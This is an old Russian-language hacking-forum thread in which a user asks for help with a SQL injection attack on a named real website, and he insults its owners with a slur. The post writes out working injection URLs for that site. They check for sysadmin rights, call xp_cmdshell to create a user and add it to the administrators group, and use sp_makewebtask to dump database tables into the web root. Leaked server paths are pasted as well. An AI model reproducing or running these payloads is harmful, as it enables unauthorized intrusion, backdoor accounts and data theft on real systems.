ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу mssql inj вопрос для гуру
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

mssql inj вопрос для гуру
  #1  
Старый 24.07.2007, 23:56
Аватар для $jason$
$jason$
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532

Репутация: 3
По умолчанию mssql inj вопрос для гуру
Здравствуйте помогите понять почему неработают некоторые фишки mssql
для примера взял инъекцию на сайте пидоров
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=-1'
тут sql-inj с правами sa
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=system_user
Syntax error converting the nvarchar value 'sa' to a column of data type int.

хочу добавить юзера через xp_cmdshell

Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20user%20test1%20hacker%20/add';--
Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell% 20'net%20localgroup%20administrators%20test1%20/add';--
выдаёт Incorrect syntax near 'net'.
что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный

пробую зделать дамп таблиц через sp_makewebtask

Цитата:
http://cybersocket.com/current/current.cfm?issue_id=1;%20EXEC%20master..sp_makewe btask%20%22C:\Inetpub\wwwroot\www.cybersocket.com\ includes\output.html%22,%22SELECT%20*%20FROM%20%20 %20%20INFORMATION_SCHEMA.TABLES%22;--
тоже неполучается,пробовал и в расшаренную папку на удалённом сервере и тоже облом

Incorrect syntax near the keyword 'order'.

тут что я нетак делаю?

путьдо веб директории в ошибке взял
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'.

The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1
Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17
Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1

P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Провидение Иньекций в MSSQL сервер от Microsoft. guest3297 Авторские статьи 102 06.04.2010 20:38
большой обзор программ для шифрования и защиты данных BlackCats Soft - Windows 15 25.11.2007 23:28
Руководство для начинающих по созданию Live CD из LFS 6.0 system_32 Чужие Статьи 2 14.03.2007 19:42
Моделирование программно-аппаратных ''реактивных'' систем раскрашенными сетями Петри bxN5 Чужие Статьи 1 09.03.2007 15:50
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ